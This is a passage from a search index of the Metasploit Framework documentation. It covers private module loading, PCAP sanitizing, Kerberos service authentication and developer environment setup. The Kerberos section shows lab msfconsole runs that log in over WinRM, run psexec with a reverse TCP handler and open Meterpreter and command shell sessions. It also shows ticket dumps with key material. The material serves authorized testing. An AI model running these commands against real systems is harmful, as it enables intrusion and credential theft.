    "content": "That’s really all there is to it. The most common problems that people (including myself) run into are: . | Attempting to create a module in $HOME/.msf4/modules/. This won’t work because you need to specify if it’s an exploit or a payload or something. Check ls /opt/metasploit/apps/pro/msf3/modules/ (or where your install of Metasploit lives). | Attempting to create a module in $HOME/.msf4/modules/auxiliary/. This won’t work because you need at least one level of categorization. It can be new, like auxiliary/0day/, or existing, like auxiliary/scanner/scada/. | Attempting to create a module in $HOME/.msf4/exploit/ or $HOME/.msf4/posts/. Note the pluralization of the directory names; they’re different for different things. Exploits, payloads, encoders, and nops are plural, while auxiliary and post are singular. | . Metasploit Pro . Note that the $HOME directory for Metasploit Community Edition is going to be root and not your own user directory, so if you are expecting modules to show up in the Metasploit Pro web UIs, you will want to stash your external modules in /root/.msf4/modules. Of course, this means you need root access to the machine in question, but hey, you’re a l33t Metasploit user, so that shouldn’t be too hard. Also note that if your modules are not displaying in the web UI, you should restart the Pro service. Windows . For Windows users, the above is all true, except for accessing the modules from the web GUI. Sadly, you’re a little out of luck; the module load paths on Windows are a little more restrictive and don’t allow for external modules. However, the Console2-based Metasploit Console (Start > Programs > Metasploit > Metasploit Console) will work out just fine. New mixins and protocols . 
Any module that relies on changes to core library functions, such as new protocol parsers or other library mixins, isn’t going to work out for you this way – you’re going to end up spewing errors all over the place as your module tries to load these classes. It’s possible to write modules as completely self-contained in nearly all cases (thanks to Ruby’s open class architecture), but such modules nearly always get refactored later to make the protocol and other mixin bits available to other modules. In this case, it would be better to work with modules like that using a proper GitHub checkout with a development branch – see the dev environment setup docs for tons more on that. ",
    "url": "/docs/using-metasploit/intermediate/running-private-modules.html#troubleshooting",
    "relUrl": "/docs/using-metasploit/intermediate/running-private-modules.html#troubleshooting"
  },"778": {
    "doc": "Running Private Modules",
    "title": "A final warning",
    "content": "If you are loading new and exciting Metasploit modules, know that these things will tend to have access to anything you have access to; doubly so if you’re dropping them in root. Metasploit modules are plain text Ruby, so you can read them – but please be careful, and only add external modules from trusted sources; don’t just go grabbing any old thing you see on the Internet, because you may find yourself backdoored (or worse) in short order. ",
    "url": "/docs/using-metasploit/intermediate/running-private-modules.html#a-final-warning",
    "relUrl": "/docs/using-metasploit/intermediate/running-private-modules.html#a-final-warning"
  },"779": {
    "doc": "Running Private Modules",
    "title": "Running Private Modules",
    "content": "If you’re in the business of writing or collecting Metasploit modules that aren’t part of the standard distribution, then you need a convenient way to load those modules in Metasploit. Never fear, it’s pretty easy, using Metasploit’s default local module search path, $HOME/.msf4/modules, and there are just a couple caveats: . ",
    "url": "/docs/using-metasploit/intermediate/running-private-modules.html",
    "relUrl": "/docs/using-metasploit/intermediate/running-private-modules.html"
  },"780": {
    "doc": "Sanitizing PCAPs",
    "title": "Kali Linux",
    "content": "tcprewrite can be used to change the IP and MAC addresses. The following command will take care of both of those: tcprewrite --seed=<int> --infile=<infile> --outfile=<outfile> --dlt=enet --enet-dmac=<dmac> --enet-smac=<smac> . | seed is used to seed the pseudo-random rewriting of the IP addresses. Pick a number for here, 111 is acceptable. | dlt fixes an error: dlt_linux_ssl plugin does not support packet encoding | enet-dmac fixes the destination mac. 00:00:00:00:00:00 works | enet-smac fixes the source mac. 11:11:11:11:11:11 works | . Note that this only rewrites the Ethernet and IP headers: hostnames, credentials or addresses carried inside the application payload are left as they are, so open the result in Wireshark and check the payloads before sending it anywhere. ",
    "url": "/docs/development/get-started/sanitizing-pcaps.html#kali-linux",
    "relUrl": "/docs/development/get-started/sanitizing-pcaps.html#kali-linux"
  },"781": {
    "doc": "Sanitizing PCAPs",
    "title": "Sanitizing PCAPs",
    "content": "Before submitting a pcap to [email protected], you may choose to sanitize it. Mainly, you’ll want to change the mac addresses and IP addresses. ",
    "url": "/docs/development/get-started/sanitizing-pcaps.html",
    "relUrl": "/docs/development/get-started/sanitizing-pcaps.html"
  },"782": {
    "doc": "Authenticating to SMB/WinRM/etc",
    "title": "Service Authentication",
    "content": "Since version 6.3, Metasploit has included authentication via Kerberos for multiple types of modules. Kerberos authentication allows Metasploit users to request and utilize Ticket Granting Tickets (TGTs) and Ticket Granting Services (TGSs) to authenticate with supported modules. Metasploit uses an internal caching and storage mechanism but tickets are stored able to be both exported and imported from MIT Credential Cache (CCACHE) files. A converter for Kirbi to and from CCACHE files is also available in the auxiliary/admin/kerberos/ticket_converter module. Metasploit currently offers Kerberos authentication for the following services - see the below references for more details and examples: . | SMB Kerberos Authentication | WinRM Kerberos Authentication | LDAP Kerberos Authentication | MSSQL Kerberos Authentication | . Examples . Open a WinRM session: . msf6 &amp;gt; use auxiliary/scanner/winrm/winrm_login msf6 auxiliary(scanner/winrm/winrm_login) &amp;gt; run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local [+] 192.168.123.13:88 - Received a valid TGT-Response [*] 192.168.123.13:5985 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_451736.bin [+] 192.168.123.13:88 - Received a valid TGS-Response [*] 192.168.123.13:5985 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_889546.bin [+] 192.168.123.13:88 - Received a valid delegation TGS-Response [+] 192.168.123.13:88 - Received AP-REQ. Extracting session key... 
[+] 192.168.123.13:5985 - Login Successful: demo.local\\Administrator:p4$$w0rd [*] Command shell session 1 opened (192.168.123.1:50722 -&amp;gt; 192.168.123.13:5985) at 2023-01-18 12:06:05 +0000 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/winrm/winrm_login) &amp;gt; sessions -i -1 [*] Starting interaction with 1... Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\\Users\\Administrator&amp;gt; . Query LDAP for accounts: . msf6 &amp;gt; use auxiliary/gather/ldap_query msf6 auxiliary(gather/ldap_query) &amp;gt; run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13 [*] Running module against 192.168.123.13 [+] 192.168.123.13:88 - Received a valid TGT-Response [*] 192.168.123.13:389 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_216797.bin [+] 192.168.123.13:88 - Received a valid TGS-Response [*] 192.168.123.13:389 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_638903.bin [+] 192.168.123.13:88 - Received a valid delegation TGS-Response [*] Discovering base DN automatically [+] 192.168.123.13:389 Discovered base DN: DC=adf3,DC=local CN=Administrator CN=Users DC=adf3 DC=local ========================================== Name Attributes ---- ---------- badpwdcount 0 description Built-in account for administering the computer/domain lastlogoff 1601-01-01 00:00:00 UTC lastlogon 2023-01-23 11:02:49 UTC logoncount 159 memberof CN=Group Policy Creator Owners,CN=Users,DC=domain,DC=local || CN=Domain Admins,CN=Users,DC=domain,DC=local | CN=Enterprise Admins,CN=Users,DC=domain,DC=local || CN=Schema Admins,CN=Users,DC=domain,DC=local || CN=Adm inistrators,CN=Builtin,DC=domain,DC=local name 
Administrator objectsid S-1-5-21-3402587289-1488798532-3618296993-500 pwdlastset 133189448681297271 samaccountname Administrator useraccountcontrol 512 ... etc ... Running psexec against a host: . msf6 &amp;gt; use exploit/windows/smb/psexec msf6 exploit(windows/smb/psexec) &amp;gt; run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local [*] Started reverse TCP handler on 192.168.123.1:4444 [*] 192.168.123.13:445 - Connecting to the server... [*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|demo.local as user 'Administrator'... [+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGT-Response [*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_474531.bin [+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response [*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_169149.bin [+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid delegation TGS-Response [*] 192.168.123.13:445 - Selecting PowerShell target [*] 192.168.123.13:445 - Executing the payload... [+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (175686 bytes) to 192.168.123.13 [*] Meterpreter session 6 opened (192.168.123.1:4444 -&amp;gt; 192.168.123.13:49738) at 2023-01-18 12:09:13 +0000 meterpreter &amp;gt; . Connect to a Microsoft SQL Server instance and run a query: . 
msf6 &amp;gt; use auxiliary/admin/mssql/mssql_sql msf6 auxiliary(admin/mssql/mssql_sql) &amp;gt; run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid' [*] Reloading module... [*] Running module against 192.168.123.13 [*] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGT-Response [+] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGS-Response [*] 192.168.123.13:1433 - 192.168.123.13:88 - TGS MIT Credential Cache saved to ~/.msf4/loot/20220630193907_default_192.168.123.13_windows.kerberos_556101.bin [*] 192.168.123.13:1433 - SQL Query: select auth_scheme from sys.dm_exec_connections where session_id=@@spid [*] 192.168.123.13:1433 - Row Count: 1 (Status: 16 Command: 193) auth_scheme ----------- KERBEROS [*] Auxiliary module execution completed . Options . Kerberos authentication requires additional options to be set. Some of them are prefixed with the protocol the module is authenticating. For example, the PSexec module which operates over SMB would use the “SMB” prefix. Required options: . | ${Prefix}::Auth – The authentication modes this module supports. Set it to “kerberos” to use Kerberos authentication. i.e. Smb::Auth=kerberos | ${Prefix}::Rhostname – The hostname of the target system. This value should be either the hostname WIN-MIJZ318SQH or the FQDN like WIN-MIJZ318SQH.msflab.local. i.e. Smb::Rhostname=WIN-MIJZ318SQH.msflab.local | ${Prefix}Domain – The domain name of the target system, e.g. msflab.local. i.e. SmbDomain=msflab.local | . Optional options: . | DomainControllerRhost – The IP address or hostname of the domain controller to use for Kerberos authentication. i.e. DomainControllerRhost=192.168.123.13. If this value is not specified, Metasploit will look it up via the realm’s (the ${Prefix}Domain option) SRV record in DNS. 
| ${Prefix}::Krb5Ccname – The path to a CCACHE file to use for authentication. This is comparable to setting the KRB5CCNAME environment variable for other tools. If specified, the tickets it contains will be used. i.e. KRB5CCNAME=/path/to/Administrator.ccache. | KrbCacheMode – The cache storage mode to use, one of the following four options: . | none – No cache storage is used, new tickets are requested and no tickets are stored. | read-only – Stored tickets from the cache will be used, but no new tickets are stored. | write-only – New tickets are requested and they are stored for reuse. | read-write – Stored tickets from the cache will be used and new tickets will be stored for reuse. | . | ${Prefix}KrbOfferedEncryptionTypes' -- The list of encryption types presented to the KDC as being supported by the Metasploit client. i.e. SmbKrbOfferedEncryptionTypes=AES256` | . ",
    "url": "/docs/pentesting/active-directory/kerberos/service_authentication.html#service-authentication",
    "relUrl": "/docs/pentesting/active-directory/kerberos/service_authentication.html#service-authentication"
  },"783": {
    "doc": "Authenticating to SMB/WinRM/etc",
    "title": "Ticket management",
    "content": "When a write-enabled KrbCacheMode is used, tickets that are issued to Metasploit will be stored for reuse. The klist command can be used to view tickets. It is a top level command and can be run even if a module is in use. msf6 &amp;gt; klist Kerberos Cache ============== host principal sname issued status path ---- --------- ----- ------ ------ ---- 192.168.159.10 [email protected] krbtgt/[email protected] 2022-12-15 18:25:48 -0500 &amp;gt;&amp;gt;expired&amp;lt;&amp;lt; /home/smcintyre/.msf4/loot/20221215182546_default_192.168.159.10_mit.kerberos.cca_867855.bin 192.168.159.10 [email protected] cifs/[email protected] 2022-12-15 18:25:48 -0500 &amp;gt;&amp;gt;expired&amp;lt;&amp;lt; /home/smcintyre/.msf4/loot/20221215182546_default_192.168.159.10_mit.kerberos.cca_699376.bin 192.168.159.10 [email protected] krbtgt/[email protected] 2022-12-16 14:51:50 -0500 valid /home/smcintyre/.msf4/loot/20221216145149_default_192.168.159.10_mit.kerberos.cca_782487.bin 192.168.159.10 [email protected] cifs/[email protected] 2022-12-16 17:07:48 -0500 valid /home/smcintyre/.msf4/loot/20221216170747_default_192.168.159.10_mit.kerberos.cca_156303.bin 192.168.159.10 [email protected] cifs/[email protected] 2022-12-16 17:08:26 -0500 valid /home/smcintyre/.msf4/loot/20221216170825_default_192.168.159.10_mit.kerberos.cca_196712.bin 192.168.159.10 [email protected] krbtgt/[email protected] 2022-12-16 15:03:03 -0500 valid /home/smcintyre/.msf4/loot/20221216150302_default_192.168.159.10_mit.kerberos.cca_729805.bin 192.168.159.10 [email protected] krbtgt/[email protected] 2022-12-16 15:25:16 -0500 valid /home/smcintyre/.msf4/loot/20221216152515_default_192.168.159.10_mit.kerberos.cca_934698.bin . More detailed information can be displayed by using the verbose (-v / --verbose) option. 
msf6 &amp;gt; klist -v Kerberos Cache ============== Cache[0]: Primary Principal: [email protected] Ccache version: 4 Creds: 1 Credential[0]: Server: krbtgt/[email protected] Client: [email protected] Ticket etype: 18 (AES256) Key: 9c66cb7de8f4d3100690771a753012eafa44a3d128342939ff9230b39aeb1713 Subkey: false Ticket Length: 1090 Ticket Flags: 0x50e10000 (FORWARDABLE, PROXIABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE) Addresses: 0 Authdatas: 0 Times: Auth time: 2022-12-13 12:57:49 +0000 Start time: 2022-12-13 12:57:49 +0000 End time: 2022-12-13 22:57:49 +0000 Renew Till: 2022-12-14 12:57:49 +0000 Ticket: Ticket Version Number: 5 Realm: demo.local Server Name: krbtgt/demo.local Encrypted Ticket Part: Ticket etype: 18 (AES256) Key Version Number: 2 Cipher: [truncated] . The klist command can also be used for deleting tickets from the cache. ",
    "url": "/docs/pentesting/active-directory/kerberos/service_authentication.html#ticket-management",
    "relUrl": "/docs/pentesting/active-directory/kerberos/service_authentication.html#ticket-management"
  },"784": {
    "doc": "Authenticating to SMB/WinRM/etc",
    "title": "Ticket cache storage",
    "content": "Metasploit stores tickets for future use in a user configurable way as controlled by the KrbCacheMode datastore option. When a user attempts to use Kerberos to authenticate to a remote service such as SMB, if the cache mode is read-enabled (e.g. set to read-only or read-write) and Metasploit is connected to a database, it will attempt to fetch an existing ticket using the following steps targeting SMB for example purposes. | If an external ticket is specified in the ${Prefix}::Krb5Ccname option, that ticket will be used instead of the cache. | When using the cache, Metasploit will first use the datastore options, including the target host and username to search though the stored tickets for an SMB-specific Ticket Granting Service (TGS). If one is found, it will be used. Tickets that are expired will not be used. | If no TGS is found, Metasploit will repeat the search process looking for a Ticket Granting Ticket (TGT). If one is found, it will be used to contact the Key Distribution Center (KDC) and request a TGS for authentication to the SMB service. | If no TGT is found, Metasploit will contact the KDC and authenticate using the username and password from the datastore to request a TGT then an SMB-specific TGS before authenticating to the SMB service. | . If the cache mode is write-enabled (e.g. set to write-only or read-write) then any ticket, either TGT or TGS that is obtained either from the KDC or through other means, is stored for use in the cache. If the cache mode is not write-enabled, tickets will not be stored. Tickets are saved as loot, allowing them to be stored even if the database is not connected, however without the database, Metasploit can not lookup tickets for reuse as required by the read-enabled modes. Metasploit stores exactly one ticket per CCACHE file. Use a read-enabled cache mode to avoid unnecessary contact with the KDC. Use a write-enabled cache mode to store tickets for use with either Metasploit or other tools. ",
    "url": "/docs/pentesting/active-directory/kerberos/service_authentication.html#ticket-cache-storage",
    "relUrl": "/docs/pentesting/active-directory/kerberos/service_authentication.html#ticket-cache-storage"
  },"785": {
    "doc": "Authenticating to SMB/WinRM/etc",
    "title": "Using tickets with external tools",
    "content": "When a ticket (either TGT or TGS) is stored, it is saved along with the other loot Metasploit has collected. The raw CCACHE files can be viewed with the loot --type mit.kerberos.ccache command (the --type argument filters for the specified type). msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; loot --type mit.kerberos.ccache Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- 192.168.159.10 mit.kerberos.ccache application/octet-stream realm: MSFLAB.LOCAL, client: smcintyre, server: krbtgt/msflab.local /home/smcintyre/.msf4/loot/20221219105440_default_192.168.159.10_mit.kerberos.cca_905330.bin 192.168.159.10 mit.kerberos.ccache application/octet-stream realm: MSFLAB.LOCAL, client: smcintyre, server: cifs/dc.msflab.local /home/smcintyre/.msf4/loot/20221219105440_default_192.168.159.10_mit.kerberos.cca_539055.bin . The path on the far right is where the CCACHE file is on disk. This path can be used with other tools such as Impacket through the KRB5CCNAME environment variable. For example: . [user@localhost]$ KRB5CCNAME=/home/smcintyre/.msf4/loot/20221219105440_default_192.168.159.10_mit.kerberos.cca_539055.bin \\ python examples/smbclient.py dc.msflab.local -target-ip 192.168.159.10 -k Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2021 SecureAuth Corporation Type help for list of commands # info Version Major: 10 Version Minor: 0 Server Name: DC Server Comment: Server UserPath: c:\\ Simultaneous Users: 16777216 # . ",
    "url": "/docs/pentesting/active-directory/kerberos/service_authentication.html#using-tickets-with-external-tools",
    "relUrl": "/docs/pentesting/active-directory/kerberos/service_authentication.html#using-tickets-with-external-tools"
  },"786": {
    "doc": "Authenticating to SMB/WinRM/etc",
    "title": "Using external tickets with Metasploit",
    "content": "A ticket obtained outside of Metasploit can be used for authentication by setting the ${Prefix}::Krb5Ccname option which is prioritized over the cache. This file must be in the MIT Credential Cache (CCACHE) file format. If the ticket is in the Kirbi format, it must first be converted using the auxiliary/admin/kerberos/ticket_converter module. When an explicit CCACHE file is specified to load a ticket from, Metasploit will first attempt to load a TGS ticket from the file. If the service class of the sname component does not match the necessary value (e.g. the sname is for HOST/dc.msflab.local instead of CIFS/dc.msflab.local), the value will be patched automatically. If no TGS is found, Metasploit will attempt to load a TGT from the file and use it to contact the KDC and issue a TGS which will be stored for future use when the cache is write-enabled. It is important to set the ${Prefix}::Rhostname and ${Prefix}Domain options correctly because they are used to select the appropriate ticket from the file. ",
    "url": "/docs/pentesting/active-directory/kerberos/service_authentication.html#using-external-tickets-with-metasploit",
    "relUrl": "/docs/pentesting/active-directory/kerberos/service_authentication.html#using-external-tickets-with-metasploit"
  },"787": {
    "doc": "Authenticating to SMB/WinRM/etc",
    "title": "Authenticating to SMB/WinRM/etc",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/service_authentication.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/service_authentication.html"
  },"788": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Assumptions",
    "content": ". | You have installed an apt-based Linux environment, such as Ubuntu or Kali. | You have created a GitHub account and associated an public ssh key with it. | You have familiarity with Git and Github, or have completed the Github bootcamp. | For optional database and REST API functionality, you will need regular user account that is not root. | . This guide has details for setting up both Linux and Windows. ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#assumptions",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#assumptions"
  },"789": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Install dependencies",
    "content": "Linux . | Open a terminal on your Linux host and set up Git, build tools, and Ruby dependencies: | . sudo apt update &amp;amp;&amp;amp; sudo apt install -y git autoconf build-essential libpcap-dev libpq-dev zlib1g-dev libsqlite3-dev . Windows . If you are running a Windows machine . | Install chocolatey | Install Ruby x64 with DevKit | Install pcaprub dependencies from your cmd.exe terminal: | . powershell -Command \"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\\Windows\\Temp\\WpdPack_4_1_2.zip')\" choco install 7zip 7z x \"C:\\Windows\\Temp\\WpdPack_4_1_2.zip\" -o\"C:\\\" . Install a version of PostgreSQL: . choco install postgresql12 . ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#install-dependencies",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#install-dependencies"
  },"790": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Set up your local copy of the repository",
    "content": "You will need to use Github to create a fork for your contributions and receive the latest updates from our repository. | Login to Github and click the “Fork” button in the top-right corner of the metasploit-framework repository. | Create a git directory in your home folder and clone your fork to your local machine: | . export GITHUB_USERNAME=YOUR_USERNAME_FOR_GITHUB export GITHUB_EMAIL=YOUR_EMAIL_ADDRESS_FOR_GITHUB mkdir -p ~/git cd ~/git git clone [email protected]:$GITHUB_USERNAME/metasploit-framework cd ~/git/metasploit-framework . | If you encounter a “permission denied” error on the above command, research the error message. If there isn’t an explicit reason given, confirm that your Github SSH key is configured correctly. You will need to associate your public SSH key with your GitHub account, otherwise if you set up a SSH key and don’t associate it with your GitHub account, you will receive this “permission denied” error. | To receive updates, you will create an upstream-master branch to track the Rapid7 remote repository, alongside your master branch which will point to your personal repository’s fork: | . git remote add upstream [email protected]:rapid7/metasploit-framework.git git fetch upstream git checkout -b upstream-master --track upstream/master . | Configure your Github username, email address, and username. Ensure your user.email matches the email address you registered with your Github account. | . git config --global user.name \"$GITHUB_USERNAME\" git config --global user.email \"$GITHUB_EMAIL\" git config --global github.user \"$GITHUB_USERNAME\" . | Set up msftidy to run before each git commit and after each git merge to quickly identify potential issues with your contributions: | . cd ~/git/metasploit-framework ln -sf ../../tools/dev/pre-commit-hook.rb .git/hooks/pre-commit ln -sf ../../tools/dev/pre-commit-hook.rb .git/hooks/post-merge . ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#set-up-your-local-copy-of-the-repository",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#set-up-your-local-copy-of-the-repository"
  },"791": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Install Ruby",
    "content": "Linux distributions do not ship with the latest Ruby, nor are package managers routinely updated. Additionally, if you are working with multiple Ruby projects, each one has dependencies and Ruby versions which can start to conflict. For these reasons, it is advisable to use a Ruby manager. You could just install Ruby directly (eg. sudo apt install ruby-dev), but you may likely end up with the incorrect version and no way to update. Instead, consider using one of the many different Ruby environment managers available. The Metasploit team prefers rbenv and rvm (note that rvm does require a re-login to complete). Regardless of your choice, you’ll want to make sure that, when inside the ~/git/metasploit-framework directory, you are running the correct version of Ruby: . $ cd ~/git/metasploit-framework $ cat .ruby-version 3.0.2 $ ruby -v ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux] . Note: the Ruby version is likely to change over time, so don’t rely on the output in the above example. Instead, confirm your ruby -v output with the version number listed in the .ruby-version file. If the two versions don’t match, restart your terminal. If that does not work, consult the troubleshooting documentation for your Ruby environment manager. Unfortunately, troubleshooting the Ruby environment is beyond the scope of this document, but feel free to reach out for community support using the links at the bottom of this document. ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#install-ruby",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#install-ruby"
  },"792": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Install Gems",
    "content": "Before you run Metasploit, you will need to update the gems (Ruby libraries) that Metasploit depends on: . cd ~/git/metasploit-framework/ gem install bundler bundle install . If you encounter an error with the above command, refer to the bundle output and search for the error message along with the name of the gem that failed. Likely, you’ll need to apt get install a dependency that is required by that particular gem. Congratulations! You have now set up a development environment and the latest version of the Metasploit Framework. If you followed this guide step-by-step, and you ran into any problems, it would be super great if you could open a new issue so we can either help you, or, more likely, update the docs. ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#install-gems",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#install-gems"
  },"793": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Optional: Set up the REST API and PostgreSQL database",
    "content": "Installing the REST API and PostgreSQL is optional, and can be done in two ways. Recommended is to use the Docker approach, and fairly simple to do once you have docker installed on your system, Docker Desktop is recommended, but not mandatory. On Linux systems, simply having docker-cli is sufficient. Docker Installation . Make sure, you have docker available on your system: Docker Installation Guide . Note: Depending on your environment, these commands might require sudo . | Start the postgres container: | . docker run --rm -it -p 127.0.0.1:5433:5432 -e POSTGRES_PASSWORD=\"mysecretpassword\" postgres:14 . Wait till the postgres container is fully running. | Configure the Metasploit database: | . cd ~/git/metasploit-framework ./msfdb init --connection-string=\"postgres://postgres:[email protected]:5433/postgres\" . | If the msfdb init command succeeds, then confirm that the database is accessible to Metasploit: | . $ ./msfconsole -qx \"db_status; exit\" . Manual Installation . The following optional section describes how to manually install PostgreSQL and set up the Metasploit database. Alternatively, use our Omnibus installer which handles this more reliably. | Confirm that the PostgreSQL server and client are installed: | . sudo apt update &amp;amp;&amp;amp; sudo apt-get install -y postgresql postgresql-client sudo service postgresql start &amp;amp;&amp;amp; sudo update-rc.d postgresql enable . | Ensure that you are not running as the root user. | Initialize the Metasploit database: | . cd ~/git/metasploit-framework ./msfdb init . | If you receive an error about a component not being installed, confirm that the binaries shown are in your path using the which and find commands, then modifying your $PATH environment variable. If it was something else, open a new issue to let us know what happened. | If the msfdb init command succeeds, then confirm that the database is accessible to Metasploit: | . $ ./msfconsole -qx \"db_status; exit\" . 
Congratulations! You have now set up the Metasploit Web Service (REST API) and the backend database. ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#optional-set-up-the-rest-api-and-postgresql-database",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#optional-set-up-the-rest-api-and-postgresql-database"
  },"794": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Optional: Tips to speed up common workflows",
    "content": "The following section is optional but may improve your efficiency. Making sure you’re in the right directory to run msfconsole can become tedious, so consider using the following Bash alias: . echo 'alias msfconsole=\"pushd $HOME/git/metasploit-framework &amp;amp;&amp;amp; ./msfconsole &amp;amp;&amp;amp; popd\"' &amp;gt;&amp;gt; ~/.bash_aliases . Consider generating a GPG key to sign your commits. Read about why and how. Once you have done this, consider enabling automatic signing of all your commits with the following command: . cd *path to your cloned MSF repository on disk* git config commit.gpgsign true . Developers tend to customize their own git aliases to speed up common commands, but here are a few common ones: . [alias] # An easy, colored oneline log format that shows signed/unsigned status nicelog = log --pretty=format:'%Cred%h%Creset -%Creset %s %Cgreen(%cr) %C(bold blue)&amp;lt;%aE&amp;gt;%Creset [%G?]' # Shorthand commands to always sign (-S) and always edit the commit message. m = merge -S --no-ff --edit c = commit -S --edit # Shorthand to always blame (praise) without looking at whitespace changes b= blame -w . If you plan on working with other contributor’s pull requests, you may run the following script which makes it easier to do so: . tools/dev/add_pr_fetch.rb . After running the above script, you can checkout other pull requests more easily: . git fetch upstream git checkout fixes-to-pr-12345 upstream/pr/12345 . ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#optional-tips-to-speed-up-common-workflows",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#optional-tips-to-speed-up-common-workflows"
  },"795": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Running and writing tests",
    "content": "If you’re writing test cases (which you should), you should first configure your local database: . bundle exec rake db:create db:migrate db:seed RAILS_ENV=test . Then make sure rspec works: . bundle exec rspec . To run tests defined in file(s): . bundle exec rspec ./spec/path/to/your/tests_1.rb ./spec/path/to/your/tests_2.rb . To run the tests defined at a line number - for instance line 23: . bundle exec rspec ./spec/path/to/your/tests_1.rb:23 . Newly contributed tests should follow the conventions defined by BetterSpecs.org - with the additional requirement that all it blocks should have a human readable description. ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#running-and-writing-tests",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#running-and-writing-tests"
  },"796": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Great!  Now what?",
    "content": "We’re excited to see your upcoming contributions of new modules, documentation, and fixes! If you’re looking for inspiration, keep an eye out for newbie-friendly pull requests and issues. Please submit your new pull requests and reach out to us on Slack for community help. Finally, we welcome your feedback on this guide, so feel free to reach out to us on Slack or open a new issue. For their significant contributions to this guide, we would like to thank @kernelsmith, @corelanc0d3r, and @ffmike. ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#great--now-what",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#great--now-what"
  },"797": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Setting Up a Metasploit Development Environment",
    "content": "The shortlink to this wiki page is https://r-7.co/MSF-DEV . This is a guide for setting up a developer environment to contribute modules, documentation, and fixes to the Metasploit Framework. If you just want to use Metasploit for legal, authorized hacking, we recommend instead you: . | Install the open-source Omnibus installer, or | Use the pre-installed Metasploit on Kali Linux or Parrot Linux. | . If you want to contribute to Metasploit, start by reading our CONTRIBUTING.md, then follow the rest of this guide. ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html"
  },"798": {
    "doc": "SQL Injection",
    "title": "Supported Databases",
    "content": ". | MySQL/MariaDB (#13596) | SQLite (#13847) | PostgreSQL (#14067) | . ",
    "url": "/docs/development/developing-modules/libraries/sql-injection-libraries.html#supported-databases",
    "relUrl": "/docs/development/developing-modules/libraries/sql-injection-libraries.html#supported-databases"
  },"799": {
    "doc": "SQL Injection",
    "title": "Supported Techniques",
